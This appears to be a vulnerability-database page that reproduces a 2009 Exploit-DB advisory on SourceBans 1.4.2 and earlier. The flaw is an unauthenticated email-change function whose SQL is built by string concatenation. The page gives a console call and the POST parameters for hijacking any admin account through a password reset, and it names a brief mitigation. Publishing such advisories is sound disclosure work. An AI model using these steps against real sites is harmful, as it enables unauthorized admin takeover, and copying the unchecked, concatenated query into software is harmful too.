Sourcebans (PHP) (sb-callback.php)

vendor:

Sourcebans

by:

Mr. Anonymous

7,5

CVSS

HIGH

Unauthenticated Email Change

264

CWE

Product Name: Sourcebans

Affected Version From: <= 1.4.2

Affected Version To: <= 1.4.2

Patch Exists: NO

Related CWE: N/A

CPE: a:sourcebans:sourcebans

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Sourcebans (PHP) (sb-callback.php)

No checking is done to verify you own that email address. You can simply submit a post request with the following arguments, to change any admins email with your own (or a temporary one), and then reset their password, then get full admin access.

Mitigation:

Ensure that the application verifies the user's identity before allowing them to change their email address.

Source

Exploit-DB raw data:

Sourcebans (PHP) (sb-callback.php)
Author: Mr. Anonymous
------
Vendor:http://www.sourcebans.com
Affected Versions: <= 1.4.2
-----
Exploit (sb-callback lines 185-204):
-------------
function ChangeEmail($aid, $email)
{	
	...SNIP...
	
	$GLOBALS['db']->Execute("UPDATE `".DB_PREFIX."_admins` SET `email` =
'".$email."' WHERE `aid` = '".$aid."'");
	$objResponse->addScript("ShowBox('E-mail address changed', 'Your
E-mail address has been changed successfully.', 'green',
'index.php?p=account', true);");
	$log = new CSystemLog("m", "E-mail Changed", "E-mail changed for
admin (".$aid.")");
	return $objResponse;
}
-------
How to Exploit
-------
No checking is done to verify you own that email address.  You can
simply submit a post request with the following arguments, to change
any admins email with your own (or a temporary one), and then reset
their password, then get full admin access.

You can download firebug for firefox, and simply run in the console
"xajax_ChangeEmail(ADMIN_ID, EMAIL_TO_CHANGE_TO)", otherwise you need
to send these variables to index.php via POST:

xxajax: ChangeEmail
xajaxargs[]: ADMIN_ID
xajaxargs[]: EMAIL_TO_CHANGE_TO

# milw0rm.com [2009-06-22]